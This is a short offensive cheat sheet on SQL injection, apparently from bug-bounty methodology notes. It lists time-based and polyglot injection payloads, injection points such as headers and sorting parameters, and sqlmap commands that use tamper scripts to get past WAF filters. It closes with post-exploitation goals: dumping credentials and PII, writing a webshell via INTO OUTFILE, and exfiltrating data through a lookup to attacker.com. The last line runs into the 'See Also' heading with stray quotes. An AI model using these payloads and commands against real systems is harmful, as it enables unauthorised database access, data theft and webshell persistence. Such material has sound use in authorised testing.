SQL Injection

Legacy code and APIs are most vulnerable. Blind/time-based is most common in the wild.

Time-based payloads work when error messages are disabled (most common case):

' or sleep(15) and 1=1#
' OR sleep(15)#
' union select sleep(15),null#
'%2Bbenchmark(3200,SHA1(1))%2B'
'+BENCHMARK(40000000,SHA1(1337))+'

Polyglot payload (jhaddix):

"SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/

• Legacy features – old code = no parameterized queries
• Both GET and POST – $_GET may be safe but $_POST not
• Web services and APIs – especially older REST/SOAP endpoints
• Search boxes, filter parameters, ordering/sorting parameters
• HTTP headers: User-Agent, X-Forwarded-For, Referer (logged to DB)

# Parse Burp logs directly
sqlmap -l burp.log --tamper=space2comment --batch
 
# Target specific URL
sqlmap -u "https://target.com/page?id=1" --dbs
 
# Bypass WAF blacklists
sqlmap -u "https://target.com/page?id=1" --tamper=space2comment,charunicodeencode

• Learn the database schema: INFORMATION_SCHEMA.TABLES
• Read sensitive data: credentials, API keys, PII
• Write a webshell: INTO OUTFILE '/var/www/html/shell.php'
• OOB exfiltration when blind: DNS lookup via LOAD_FILE('attacker.com/x')'' ===== See Also ===== * TBHM SQLi * Bug Chaining * Methodology Index